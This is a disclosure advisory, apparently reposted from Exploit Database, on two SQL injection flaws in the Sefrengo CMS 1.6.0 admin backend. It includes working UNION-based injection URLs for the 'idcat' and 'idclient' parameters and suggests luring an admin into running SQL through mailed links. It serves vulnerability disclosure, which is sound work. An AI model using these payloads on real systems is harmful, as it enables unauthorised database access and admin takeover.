Sefrengo CMS 1.6.0 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Steffen Rösemann
  日期： 2015-01-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35722/

• Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0
  Advisory ID: SROEADV-2015-04
  Author: Steffen Rösemann
  Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014)
  Vendor URL: http://www.sefrengo.org/start/start.html
  Vendor Status: fixed
  CVE-ID: -
  
  ==========================
  Vulnerability Description:
  ==========================
  
  The Content Management System Sefrengo v.1.6.0 contains SQL-Injection
  vulnerabilities in its administrative Backend.
  
  ==================
  Technical Details:
  ==================
  
  The administrative Backend of Sefrengo CMS contains a functionality to edit
  folders which reside on the CMS. Its located here:
  
  http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0
  
  The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker
  could abuse this to send crafted URLs to the administrator via mail to
  execute own SQL commands (e.g. create a second admin-account).
  
  Exploit-Example:
  
  http://
  {TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0
  
  Another SQL-Injection vulnerability can be found in the administrative
  backend, where the admin can manage installed plugins. The vulnerable
  parameter is „idclient“ in the following URL:
  
  http://{TARGET}/backend/main.php?area=plug&idclient=1
  
  Exploit-Example:
  
  http://
  {TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+
  
  =========
  Solution:
  =========
  
  Update to the latest version
  
  ====================
  Disclosure Timeline:
  ====================
  21-Dec-2014 –found the vulnerability
  21-Dec-2014 - informed the developers
  22-Dec-2014 - response by vendor
  04-Jan-2015 – fix by vendor
  04-Jan-2015 - release date of this security advisory
  04-Jan-2015 - post on BugTraq / FullDisclosure
  
  ========
  Credits:
  ========
  
  Vulnerability found and advisory written by Steffen Rösemann.
  
  ===========
  References:
  ===========
  
  http://www.sefrengo.org/start/start.html
  http://sroesemann.blogspot.de